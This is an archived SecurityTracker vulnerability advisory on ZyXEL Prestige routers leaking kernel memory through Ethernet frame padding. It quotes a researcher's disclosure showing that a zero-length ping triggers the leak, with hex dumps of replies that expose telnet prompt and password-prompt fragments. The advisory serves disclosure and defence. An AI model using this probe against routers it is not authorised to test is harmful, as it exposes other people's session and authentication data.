SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Device (Router/Bridge/Hub)  >   Prestige Router (ZyXEL) Vendors:   ZyXEL Communications Corp.
ZyXEL Prestige Router Discloses Portions of Memory Contents to Remote Users
SecurityTracker Alert ID:  1008999
SecurityTracker URL:  http://securitytracker.com/id/1008999
CVE Reference:   CAN-2003-0001   (Links to External Site)
Updated:  Sep 14 2004
Original Entry Date:  Feb 10 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): ZyNOS F/W Version: V3.40(ES.5), 2/10/2003
Description:   An information disclosure vulnerability was reported in the ZyXEL Prestige ADSL router. A remote user can view portions of kernel memory.

@Stake originally reported that several Ethernet Network Interface Card (NIC) device drivers do not properly perform frame padding and may include portions of previously transmitted packets or kernel memory within padded Ethernet packets.

A remote user on the same Ethernet subnet can send packets to the target system and may be able to view portions of the target system's kernel memory (or of previously transmitted information) in the reply packets.

In this report, DiSToAGe has indicated that ZyXEL routers are also affected. A remote user on the LAN-side interface can reportedly send an ICMP packet or a TCP packet to the target device and can then monitor portions of the device's memory in the resulting response.

The author indicated that it was unknown whether this flaw affects the ADSL side.

The vendor has reportedly been notified without response.

In September 2004, Przemyslaw Frasunek subsequently reported that the Zyxel P681 (ZyNOS S/W Version: Vt020225a | 2/25/2002) discloses portions of memory in ARP requests.
Impact:   A remote user on the local Ethernet may be able to view portions of previously transmitted packets or kernel memory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.zyxel.com/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  

Message History:   None.

 Source Message Contents
Date:  Sat, 07 Feb 2004 13:42:05 +0100
Subject:  [Fwd: zyxel prestige ethernet information leakage]


I sent a mail to the vendor, without response , so here it is.

In the exemple here you can see informations about the telnet interface
previously connected to.

Note the problem do not only exist with icmp packet but seems to be in
ACK packet on TCP too. I don't know if the problem exist only on the LAN
side or if the bad padding is added on the ADSL side too, so
informations can be seen by remote hosts.

I don't know if other model are vulnerable too.

> 
> Hi,
> 
> Some ethernet interface have security problems : information leakage
> please see CERT vulnerability #412115
> 
> http://www.kb.cert.org/vuls/id/412115
> 
> It say that Zyxel devices with ZyNOS v.2.50 to v.3.60 are not vulnerable
> but it isn't true.
> 
> Here you can see report with a Zyxel prestige 650R-11 ADSL router.
> 
> 		Name: Router
>                 Routing: IP
>                 ZyNOS F/W Version: V3.40(ES.5) | 2/10/2003
>                 ADSL Chipset Vendor:  Alcatel, Version  3.9.122
>                 Standard: Multi-Mode
> 
> send icmp packet with less data than normal so remote interface padd
> with data to complete the frame :
> 
> ping -s 0 router
> 
> Here is the replies, you can see other portion of memory on replies by
> router :
> 
> 10:15:42.904088 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae1 0000 fe01 aeab c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f2 e80c 0001 456e 7465        ............Ente
> 0x0020   721b 5b32 313b 3333 484d 656e 751b             r.[21;33HMenu.
> 10:15:43.918189 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae2 0000 fe01 aeaa c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f1 e80c 0002 6377 437a        ............cwCz
> 0x0020   5010 03ff 434b 0000 27ff fc05 fffe             P...CK..'.....
> 10:15:44.928354 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae3 0000 fe01 aea9 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17f0 e80c 0003 6377 437a        ............cwCz
> 0x0020   5010 0400 434a 0000 0204 0200 c0a8             P...CJ........
> 10:15:45.938513 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae4 0000 fe01 aea8 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ef e80c 0004 5061 7373        ............Pass
> 0x0020   776f 7264 3a20 0000 02ac 3c93 c0a8             word:.....<...
> 10:15:46.948675 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae5 0000 fe01 aea7 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ee e80c 0005 6377 437c        ............cwC|
> 0x0020   5010 03fe 4349 0000 0204 0200 c0a8             P...CI........
> 10:15:47.958838 router > station: icmp: echo reply
> 0x0000   4500 001c 8ae6 0000 fe01 aea6 c0a8 0101        E...............
> 0x0010   c0a8 0102 0000 17ed e80c 0006 6377 437c        ............cwC|
> 0x0020   5010 0400 4347 0000 75dd 6642 c0a8             P...CG..u.fB..
> 
> 
> 
>


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC